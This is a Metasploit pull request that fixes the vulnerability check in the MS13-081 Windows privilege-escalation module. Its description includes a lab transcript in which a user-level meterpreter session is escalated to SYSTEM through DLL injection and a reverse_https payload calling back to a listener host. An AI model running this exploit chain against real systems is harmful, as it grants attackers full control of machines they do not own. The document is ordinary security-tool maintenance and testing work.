### PR TITLE
Fix ms13_081_track_popup_menu

### DIFF
--- a/modules/exploits/windows/local/ms13_081_track_popup_menu.rb
+++ b/modules/exploits/windows/local/ms13_081_track_popup_menu.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Local
       fail_with(Failure::None, 'Session is already elevated')
     end
 
-    if check != Exploit::CheckCode::Vulnerable
+    if check == Exploit::CheckCode::Safe
       fail_with(Failure::NotVulnerable, "Exploit not available on this system.")
     end
 


### PR DESCRIPTION
Fix the exploit check.
Issue number is not assigned.
## Verification
- [x] Create a meterpreter session as a non-privileged user.
- [x] use exploit/windows/local/ms13_081_track_popup_menu
### Windows7 SP1 x86

```
msf > sessions

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  PC-VX57UA9\user @ PC-VX57UA9  10.0.1.81:8080 -> 10.0.1.101:49223 (10.0.1.101)

msf > use exploit/windows/local/ms13_081_track_popup_menu
msf exploit(ms13_081_track_popup_menu) > set PAYLOAD windows/meterpreter/reverse_https
PAYLOAD => windows/meterpreter/reverse_https
msf exploit(ms13_081_track_popup_menu) > set LHOST 10.0.1.81
LHOST => 10.0.1.81
msf exploit(ms13_081_track_popup_menu) > set LPORT 443
LPORT => 443
msf exploit(ms13_081_track_popup_menu) > set SESSION 1
SESSION => 1
msf exploit(ms13_081_track_popup_menu) > show options

Module options (exploit/windows/local/ms13_081_track_popup_menu):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Payload options (windows/meterpreter/reverse_https):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.0.1.81        yes       The local listener hostname
   LPORT     443              yes       The local listener port
   LURI                       no        The HTTP Path


Exploit target:

   Id  Name
   --  ----
   0   Windows 7 SP0/SP1


msf exploit(ms13_081_track_popup_menu) > exploit

[*] Started HTTPS reverse handler on https://10.0.1.81:443/
[*] Launching notepad to host the exploit...
[+] Process 4028 launched.
[*] Reflectively injecting the exploit DLL into 4028...
[*] Injecting exploit into 4028...
[*] Exploit injected. Injecting payload into 4028...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] https://10.0.1.81:443/ handling request from 10.0.1.101; (UUID: qefku3fl) Staging Native payload...
[*] Meterpreter session 2 opened (10.0.1.81:443 -> 10.0.1.101:49225) at 2016-05-27 17:24:22 +0900

meterpreter > sysinfo
Computer        : PC-VX57UA9
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : ja_JP
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 
```
